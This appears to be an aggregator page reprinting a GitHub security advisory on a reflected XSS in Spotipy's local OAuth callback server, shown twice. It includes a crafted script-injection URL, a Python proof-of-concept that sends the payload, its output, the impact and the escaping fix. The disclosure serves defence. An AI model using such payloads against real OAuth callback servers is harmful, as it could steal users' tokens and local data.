Security
Headlines
HeadlinesLatestCVEs

Headline

GHSA-r77h-rpp9-w2xm: Spotipy has a XSS vulnerability in its OAuth callback server

Summary

XSS vulnerability in OAuth callback server allows JavaScript injection through unsanitized error parameter. Attackers can execute arbitrary JavaScript in the user’s browser during OAuth authentication.

Details

Vulnerable Code: spotipy/oauth2.py lines 1238-1274 (RequestHandler.do_GET)

The Problem: During OAuth flow, spotipy starts a local HTTP server to receive callbacks. The server reflects the error URL parameter directly into HTML without sanitization.

Vulnerable code at line 1255:

status = f"failed ({self.server.error})"

Then embedded in HTML at line 1265:

self._write(f"""<html>
<body>
<h1>Authentication status: {status}</h1>
</body>
</html>""")

The error parameter comes from URL parsing (lines 388-393) without HTML escaping, allowing script injection.

Attack Flow:

  1. User starts OAuth authentication → local server runs on http://127.0.0.1:8080
  2. Attacker crafts malicious URL: http://127.0.0.1:8080/?error=<script>alert(1)</script>&state=x
  3. User visits URL → JavaScript executes in localhost origin

PoC

Simple Python Test:

#!/usr/bin/env python3
# poc_xss.py - Demonstrates XSS in spotipy OAuth callback

import requests
from spotipy.oauth2 import start_local_http_server
import threading
import time

# Start vulnerable server in background
def start_server():
    server = start_local_http_server(8080)
    server.handle_request()

thread = threading.Thread(target=start_server, daemon=True)
thread.start()
time.sleep(2)

# Send XSS payload
payload = '<script>alert("XSS")</script>'
url = f'http://127.0.0.1:8080/?error={payload}&state=test'

response = requests.get(url)
print(f"Status: {response.status_code}")
print(f"\nHTML Response:\n{response.text}")

# Check if vulnerable
if payload in response.text:
    print(f"\n[!] VULNERABLE: Payload '{payload}' reflected without escaping!")
else:
    print("\n[+] Safe: Payload was sanitized")

Run it:

pip install spotipy requests
python3 poc_xss.py

Output shows:

Status: 200
HTML Response:
<html>
<body>
<h1>Authentication status: failed (<script>alert("XSS")</script>)</h1>
</body>
</html>

[!] VULNERABLE: Payload '<script>alert("XSS")</script>' reflected without escaping!

The Proof:

  • Expected (safe): &lt;script&gt;alert("XSS")&lt;/script&gt;
  • Actual (vulnerable): <script>alert("XSS")</script>
  • The script tags are NOT escaped → XSS confirmed

Impact

Vulnerability Type: Cross-Site Scripting (XSS) - CWE-79

Affected Users: Anyone using spotipy’s OAuth flow with localhost redirect URIs

Attack Complexity: Medium-High

  • Requires timing (during brief OAuth window)
  • Localhost-only (127.0.0.1)
  • Requires user interaction (click malicious link)

Potential Impact:

  • Execute JavaScript in localhost origin
  • Access other localhost services (port scanning, API calls)
  • Steal data from local web applications
  • Extract OAuth tokens from browser storage
  • Bypass CSRF protections on localhost endpoints

CVSS 3.1 Score: 4.2 (Medium)

  • Attack Vector: Local
  • Attack Complexity: High
  • Privileges Required: None
  • User Interaction: Required
  • Scope: Unchanged
  • Confidentiality/Integrity: Low

Recommended Fix:

import html

# Line 1255 - apply HTML escaping
if self.server.error:
    status = f"failed ({html.escape(str(self.server.error))})"
ghsa
Open in Source
#xss#csrf#vulnerability#web#java#oauth#auth

Summary

XSS vulnerability in OAuth callback server allows JavaScript injection through unsanitized error parameter. Attackers can execute arbitrary JavaScript in the user’s browser during OAuth authentication.

Details

Vulnerable Code: spotipy/oauth2.py lines 1238-1274 (RequestHandler.do_GET)

The Problem:
During OAuth flow, spotipy starts a local HTTP server to receive callbacks. The server reflects the error URL parameter directly into HTML without sanitization.

Vulnerable code at line 1255:

status = f"failed ({self.server.error})"

Then embedded in HTML at line 1265:

self._write(f"""<html> <body> <h1>Authentication status: {status}</h1> </body> </html>""")

The error parameter comes from URL parsing (lines 388-393) without HTML escaping, allowing script injection.

Attack Flow:

  1. User starts OAuth authentication → local server runs on http://127.0.0.1:8080
  2. Attacker crafts malicious URL: http://127.0.0.1:8080/?error=<script>alert(1)</script>&state=x
  3. User visits URL → JavaScript executes in localhost origin

PoC

Simple Python Test:

#!/usr/bin/env python3 # poc_xss.py - Demonstrates XSS in spotipy OAuth callback

import requests from spotipy.oauth2 import start_local_http_server import threading import time

# Start vulnerable server in background def start_server(): server = start_local_http_server(8080) server.handle_request()

thread = threading.Thread(target=start_server, daemon=True) thread.start() time.sleep(2)

# Send XSS payload payload = ‘<script>alert(“XSS”)</script>’ url = f’http://127.0.0.1:8080/?error={payload}&state=test’

response = requests.get(url) print(f"Status: {response.status_code}") print(f"\nHTML Response:\n{response.text}")

# Check if vulnerable if payload in response.text: print(f"\n[!] VULNERABLE: Payload ‘{payload}’ reflected without escaping!") else: print(“\n[+] Safe: Payload was sanitized”)

Run it:

pip install spotipy requests python3 poc_xss.py

Output shows:

Status: 200
HTML Response:
<html>
<body>
<h1>Authentication status: failed (<script>alert("XSS")</script>)</h1>
</body>
</html>

[!] VULNERABLE: Payload '<script>alert("XSS")</script>' reflected without escaping!

The Proof:

  • Expected (safe): <script>alert(“XSS”)</script>
  • Actual (vulnerable): <script>alert(“XSS”)</script>
  • The script tags are NOT escaped → XSS confirmed

Impact

Vulnerability Type: Cross-Site Scripting (XSS) - CWE-79

Affected Users: Anyone using spotipy’s OAuth flow with localhost redirect URIs

Attack Complexity: Medium-High

  • Requires timing (during brief OAuth window)
  • Localhost-only (127.0.0.1)
  • Requires user interaction (click malicious link)

Potential Impact:

  • Execute JavaScript in localhost origin
  • Access other localhost services (port scanning, API calls)
  • Steal data from local web applications
  • Extract OAuth tokens from browser storage
  • Bypass CSRF protections on localhost endpoints

CVSS 3.1 Score: 4.2 (Medium)

  • Attack Vector: Local
  • Attack Complexity: High
  • Privileges Required: None
  • User Interaction: Required
  • Scope: Unchanged
  • Confidentiality/Integrity: Low

Recommended Fix:

import html

# Line 1255 - apply HTML escaping if self.server.error: status = f"failed ({html.escape(str(self.server.error))})"

References

  • GHSA-r77h-rpp9-w2xm
  • https://nvd.nist.gov/vuln/detail/CVE-2025-66040
  • spotipy-dev/spotipy@880b92d

ghsa: Latest News

GHSA-569q-mpph-wgww: Better Auth affected by external request basePath modification DoS
ghsa